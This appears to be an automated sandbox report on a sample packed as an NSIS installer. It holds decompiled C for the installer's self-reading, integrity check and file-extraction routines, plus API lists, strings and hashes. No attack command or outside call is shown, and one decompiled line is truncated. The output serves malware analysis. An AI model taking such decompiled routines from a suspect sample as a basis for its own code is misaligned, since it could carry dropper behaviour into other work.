                                                            control_flow_graph 660 402f0c-402f5a GetTickCount GetModuleFileNameA call 405dea 663 402f66-402f94 call 406257 call 405c30 call 406257 GetFileSize 660->663 664 402f5c-402f61 660->664 672 402f9a 663->672 673 40307f-40308d call 402ea8 663->673 665 40313c-403140 664->665 674 402f9f-402fb6 672->674 679 4030e2-4030e7 673->679 680 40308f-403092 673->680 676 402fb8 674->676 677 402fba-402fc3 call 403355 674->677 676->677 686 4030e9-4030f1 call 402ea8 677->686 687 402fc9-402fd0 677->687 679->665 682 403094-4030ac call 40336b call 403355 680->682 683 4030b6-4030e0 GlobalAlloc call 40336b call 403143 680->683 682->679 706 4030ae-4030b4 682->706 683->679 711 4030f3-403104 683->711 686->679 690 402fd2-402fe6 call 405da5 687->690 691 40304c-403050 687->691 696 40305a-403060 690->696 709 402fe8-402fef 690->709 695 403052-403059 call 402ea8 691->695 691->696 695->696 702 403062-40306c call 40671a 696->702 703 40306f-403077 696->703 702->703 703->674 710 40307d 703->710 706->679 706->683 709->696 715 402ff1-402ff8 709->715 710->673 712 403106 711->712 713 40310c-403111 711->713 712->713 716 403112-403118 713->716 715->696 717 402ffa-403001 715->717 716->716 718 40311a-403135 SetFilePointer call 405da5 716->718 717->696 719 403003-40300a 717->719 722 40313a 718->722 719->696 721 40300c-40302c 719->721 721->679 723 403032-403036 721->723 722->665 724 403038-40303c 723->724 725 40303e-403046 723->725 724->710 724->725 725->696 726 403048-40304a 725->726 726->696
                                                            C-Code - Quality: 78%
                                                            			E00402F0C(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x45242c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x489000, 0x2000);
				_t89 = E00405DEA(0x489000, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406257(0x481000, 0x489000);
				E00406257(0x48b000, E00405C30(0x481000));
				_t50 = GetFileSize(_t89, 0);
				 *0x43204c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402EA8(1);
					if( *0x452434 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E0040336B( *0x452434 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403143(); // executed
						if(_t57 == _v24) {
							 *0x452430 = _t94;
							 *0x452438 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x45243c =  *0x45243c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405DA5(0x452440, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E0040336B( *0x426040);
					if(E00403355( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x452434) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E00403355(0x41e040, _t90) == 0) {
							E00402EA8(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x452434 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402EA8(0);
							}
							goto L20;
						}
						E00405DA5( &_v44, 0x41e040, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x426040; // 0xa399b
							 *0x4524c0 =  *0x4524c0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x452434 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x5
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x43204c) {
							_v12 = E0040671A(_v12, 0x41e040, _t90);
						}
						 *0x426040 =  *0x426040 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}



























                                                            0x00402f14
                                                            0x00402f17
                                                            0x00402f1a
                                                            0x00402f34
                                                            0x00402f39
                                                            0x00402f4c
                                                            0x00402f51
                                                            0x00402f54
                                                            0x00402f5a
                                                            0x00000000
                                                            0x00402f5c
                                                            0x00402f6d
                                                            0x00402f7e
                                                            0x00402f85
                                                            0x00402f8d
                                                            0x00402f92
                                                            0x00402f94
                                                            0x0040307f
                                                            0x00403081
                                                            0x0040308d
                                                            0x00000000
                                                            0x00000000
                                                            0x00403092
                                                            0x004030b6
                                                            0x004030c1
                                                            0x004030cc
                                                            0x004030d1
                                                            0x004030d4
                                                            0x004030d5
                                                            0x004030d6
                                                            0x004030d8
                                                            0x004030e0
                                                            0x004030f7
                                                            0x004030ff
                                                            0x00403104
                                                            0x00403106
                                                            0x00403106
                                                            0x0040310e
                                                            0x0040310e
                                                            0x00403111
                                                            0x00403112
                                                            0x00403112
                                                            0x00403115
                                                            0x00403117
                                                            0x00403117
                                                            0x00403121
                                                            0x00403127
                                                            0x00403135
                                                            0x00000000
                                                            0x0040313a
                                                            0x00000000
                                                            0x004030e0
                                                            0x0040309a
                                                            0x004030ac
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402f9a
                                                            0x00402f9f
                                                            0x00402fa4
                                                            0x00402fa8
                                                            0x00402faf
                                                            0x00402fb6
                                                            0x00402fb8
                                                            0x00402fb8
                                                            0x00402fc3
                                                            0x004030eb
                                                            0x004030e2
                                                            0x00000000
                                                            0x004030e2
                                                            0x00402fd0
                                                            0x00403050
                                                            0x00403054
                                                            0x00403059
                                                            0x00000000
                                                            0x00403050
                                                            0x00402fd9
                                                            0x00402fde
                                                            0x00402fe6
                                                            0x0040300c
                                                            0x00403012
                                                            0x0040301b
                                                            0x00403021
                                                            0x00403026
                                                            0x0040302c
                                                            0x00000000
                                                            0x00000000
                                                            0x00403036
                                                            0x0040303e
                                                            0x00403041
                                                            0x00403041
                                                            0x00403046
                                                            0x00403048
                                                            0x00403048
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403036
                                                            0x0040305a
                                                            0x00403060
                                                            0x0040306c
                                                            0x0040306c
                                                            0x0040306f
                                                            0x00403075
                                                            0x00403075
                                                            0x0040307d
                                                            0x00000000
                                                            0x0040307d

                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,0047B000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F1D
                                                            • GetModuleFileNameA.KERNEL32(00000000,00489000,00002000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            • GetFileSize.KERNEL32(00000000,00000000,0048B000,00000000,00481000,00481000,00489000,00489000,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                            • GlobalAlloc.KERNEL32(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                            Strings
                                                            • Inst, xrefs: 00402FF1
                                                            • Error launching installer, xrefs: 00402F5C
                                                            • @A, xrefs: 00402F9A
                                                            • soft, xrefs: 00402FFA
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
                                                            • Null, xrefs: 00403003
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: @A$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                            • API String ID: 2803837635-2937945327
                                                            • Opcode ID: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction ID: 4581bf354a42e99e0fb2dd836479f673db23d0c593d329681b7c8fb4cfaa4e30
                                                            • Opcode Fuzzy Hash: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction Fuzzy Hash: E751B431901204ABDB20AF65DD85B9F7EACEB15356F20813BF501B62D2C7BC8E418B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403143 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 727 403143-403157 728 403160-403169 727->728 729 403159 727->729 730 403172-403177 728->730 731 40316b 728->731 729->728 732 403187-403194 call 403355 730->732 733 403179-403182 call 40336b 730->733 731->730 737 403343 732->737 738 40319a-40319e 732->738 733->732 739 403345-403346 737->739 740 4031a4-4031ed GetTickCount 738->740 741 4032ee-4032f0 738->741 744 40334e-403352 739->744 745 4031f3-4031fb 740->745 746 40334b 740->746 742 403330-403333 741->742 743 4032f2-4032f5 741->743 747 403335 742->747 748 403338-403341 call 403355 742->748 743->746 749 4032f7 743->749 750 403200-40320e call 403355 745->750 751 4031fd 745->751 746->744 747->748 748->737 759 403348 748->759 753 4032fa-403300 749->753 750->737 761 403214-40321d 750->761 751->750 756 403302 753->756 757 403304-403312 call 403355 753->757 756->757 757->737 764 403314-403320 call 405e91 757->764 759->746 763 403223-403243 call 406788 761->763 768 4032e6-4032e8 763->768 769 403249-40325c GetTickCount 763->769 773 403322-40332c 764->773 774 4032ea-4032ec 764->774 768->739 771 4032a1-4032a3 769->771 772 40325e-403266 769->772 778 4032a5-4032a9 771->778 779 4032da-4032de 771->779 776 403268-40326c 772->776 777 40326e-40329e MulDiv wsprintfA call 405378 772->777 773->753 775 40332e 773->775 774->739 775->746 776->771 776->777 777->771 782 4032c0-4032cb 778->782 783 4032ab-4032b2 call 405e91 778->783 779->745 780 4032e4 779->780 780->746 786 4032ce-4032d2 782->786 787 4032b7-4032b9 783->787 786->763 788 4032d8 786->788 787->774 789 4032bb-4032be 787->789 788->746 789->786
                                                            C-Code - Quality: 95%
                                                            			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x42a048;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040336B( *0x452478 + _t62);
				}
				if(E00403355( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403355(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403355(0x426048, _t98) == 0) {
								goto L41;
							}
							if(E00405E91(_a8, 0x426048, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x4149ac =  *0x4149ac & 0x00000000;
					 *0x4149a8 =  *0x4149a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x414490 = 8;
					 *0x41e038 = 0x416030;
					 *0x41e034 = 0x416030;
					 *0x41e030 = 0x41e030;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403355(0x426048, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x414480 = 0x426048;
						 *0x414484 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x414488 = _t95;
							 *0x41448c = _v12;
							_t75 = E00406788("\xef\xbf\							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x414488; // 0x42ce48
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x4524d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00405378(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x414488; // 0x42ce48
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405E91(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                            0x0040314b
                                                            0x0040314f
                                                            0x00403152
                                                            0x00403157
                                                            0x00403159
                                                            0x00403159
                                                            0x00403160
                                                            0x00403164
                                                            0x00403169
                                                            0x0040316b
                                                            0x0040316b
                                                            0x00403172
                                                            0x00403177
                                                            0x00403182
                                                            0x00403182
                                                            0x00403194
                                                            0x00403343
                                                            0x00403343
                                                            0x00000000
                                                            0x0040319a
                                                            0x0040319e
                                                            0x004032f0
                                                            0x00403333
                                                            0x00403335
                                                            0x00403335
                                                            0x00403341
                                                            0x00403348
                                                            0x0040334b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403341
                                                            0x004032f5
                                                            0x00000000
                                                            0x00000000
                                                            0x004032f7
                                                            0x004032fa
                                                            0x004032fd
                                                            0x00403300
                                                            0x00403302
                                                            0x00403302
                                                            0x00403312
                                                            0x00000000
                                                            0x00000000
                                                            0x00403320
                                                            0x004032ea
                                                            0x004032ea
                                                            0x00403345
                                                            0x00403345
                                                            0x00000000
                                                            0x00403345
                                                            0x00403322
                                                            0x00403325
                                                            0x0040332c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040332e
                                                            0x00000000
                                                            0x004032fa
                                                            0x004031aa
                                                            0x004031ac
                                                            0x004031b3
                                                            0x004031ba
                                                            0x004031ba
                                                            0x004031c1
                                                            0x004031c9
                                                            0x004031d3
                                                            0x004031d8
                                                            0x004031e0
                                                            0x004031ea
                                                            0x004031ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004031f3
                                                            0x004031f3
                                                            0x004031f3
                                                            0x004031fb
                                                            0x004031fd
                                                            0x004031fd
                                                            0x0040320e
                                                            0x00000000
                                                            0x00000000
                                                            0x00403214
                                                            0x00403217
                                                            0x0040321d
                                                            0x00403223
                                                            0x00403223
                                                            0x0040322e
                                                            0x00403234
                                                            0x00403239
                                                            0x00403240
                                                            0x00403243
                                                            0x00000000
                                                            0x00000000
                                                            0x00403249
                                                            0x0040324f
                                                            0x00403251
                                                            0x0040325a
                                                            0x0040325c
                                                            0x0040328a
                                                            0x00403290
                                                            0x00403299
                                                            0x0040329e
                                                            0x0040329e
                                                            0x004032a3
                                                            0x004032de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004032a5
                                                            0x004032a9
                                                            0x004032c0
                                                            0x004032c5
                                                            0x004032c8
                                                            0x004032cb
                                                            0x004032ce
                                                            0x004032d2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004032d8
                                                            0x004032b2
                                                            0x004032b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004032bb
                                                            0x00000000
                                                            0x004032bb
                                                            0x004032a3
                                                            0x004032e6
                                                            0x00000000
                                                            0x004032e6
                                                            0x00000000
                                                            0x004031f3

                                                            APIs
                                                            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 004031AA
                                                            • GetTickCount.KERNEL32({B,00426048,00004000), ref: 00403251
                                                            • MulDiv.KERNEL32 ref: 0040327A
                                                            • wsprintfA.USER32 ref: 0040328A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%$0`A$H`B$H`B${B
                                                            • API String ID: 551687249-3260306330
                                                            • Opcode ID: 79b12083f63995c5a547f52dc9c231f5ffdbcf8cd1e0702b476da2877837ebcd
                                                            • Instruction ID: 5e435b9e5989c49516ab484f42c851a836a172a2bf0c70b81729303e7d6c5b04
                                                            • Opcode Fuzzy Hash: 79b12083f63995c5a547f52dc9c231f5ffdbcf8cd1e0702b476da2877837ebcd
                                                            • Instruction Fuzzy Hash: 59516A71801219AFDB10CFA5DA8479F7BA8AB45766F14817BEC01B72C0C7789A50CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 790 401759-40177c call 402c39 call 405c56 795 401786-401798 call 406257 call 405be9 lstrcatA 790->795 796 40177e-401784 call 406257 790->796 802 40179d-4017a3 call 406535 795->802 796->802 806 4017a8-4017ac 802->806 807 4017ae-4017b8 call 4065ce 806->807 808 4017df-4017e2 806->808 816 4017ca-4017dc 807->816 817 4017ba-4017c8 CompareFileTime 807->817 810 4017e4-4017e5 call 405dc5 808->810 811 4017ea-401806 call 405dea 808->811 810->811 818 401808-40180b 811->818 819 40187e-4018a7 call 405378 call 403143 811->819 816->808 817->816 820 401860-40186a call 405378 818->820 821 40180d-40184f call 406257 * 2 call 4062ea call 406257 call 40596d 818->821 833 4018a9-4018ad 819->833 834 4018af-4018bb SetFileTime 819->834 831 401873-401879 820->831 821->806 855 401855-401856 821->855 835 402ace 831->835 833->834 837 4018c1-4018cc CloseHandle 833->837 834->837 839 402ad0-402ad4 835->839 840 4018d2-4018d5 837->840 841 402ac5-402ac8 837->841 843 4018d7-4018e8 call 4062ea lstrcatA 840->843 844 4018ea-4018ed call 4062ea 840->844 841->835 849 4018f2-40238a 843->849 844->849 853 40238f-402394 849->853 854 40238a call 40596d 849->854 853->839 854->853 855->831 856 401858-401859 855->856 856->820
                                                            C-Code - Quality: 75%
                                                            			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402C39(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C56(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\Albus\\Raped\\Forbundskansleres.nav";
				if(_t33 == 0) {
					lstrcatA(E00405BE9(E00406257(_t83, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes")), ??);
				} else {
					E00406257();
				}
				E00406535(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065CE(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC5(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DEA(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405378(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4524a8;
						goto L32;
					} else {
						E00406257(0x40e438, 0x453000);
						E00406257(0x453000, _t83);
						E004062EA(_t75, 0x40e438, _t83, "C:\Users\Albus\Pictures\Ray\Sorghos.Rei",  *((intOrPtr*)(_t85 - 0x14)));
						E00406257(0x453000, 0x40e438);
						_t62 = E0040596D("C:\Users\Albus\Pictures\Ray\Sorghos.Rei",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4524a8 =  &( *0x4524a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00405378();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405378(0xffffffea,  *(_t85 - 8));
				 *0x4524d4 =  *0x4524d4 + 1;
				_t43 = E00403143( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x4524d4 =  *0x4524d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062EA(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062EA(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E0040596D();
					goto L29;
				}
				goto L33;
			}

















                                                            0x00401759
                                                            0x00401760
                                                            0x00401769
                                                            0x0040176c
                                                            0x0040176f
                                                            0x00401774
                                                            0x00401775
                                                            0x0040177c
                                                            0x00401798
                                                            0x0040177e
                                                            0x0040177f
                                                            0x0040177f
                                                            0x0040179e
                                                            0x004017a8
                                                            0x004017a8
                                                            0x004017ac
                                                            0x004017af
                                                            0x004017b4
                                                            0x004017b6
                                                            0x004017b8
                                                            0x004017bd
                                                            0x004017bd
                                                            0x004017c8
                                                            0x004017c8
                                                            0x004017d9
                                                            0x004017db
                                                            0x004017db
                                                            0x004017dc
                                                            0x004017dc
                                                            0x004017df
                                                            0x004017e2
                                                            0x004017e5
                                                            0x004017e5
                                                            0x004017ec
                                                            0x004017fb
                                                            0x00401800
                                                            0x00401803
                                                            0x00401806
                                                            0x00000000
                                                            0x00000000
                                                            0x00401808
                                                            0x0040180b
                                                            0x00401865
                                                            0x0040186a
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x00402ac8
                                                            0x00000000
                                                            0x0040180d
                                                            0x00401813
                                                            0x0040181e
                                                            0x0040182b
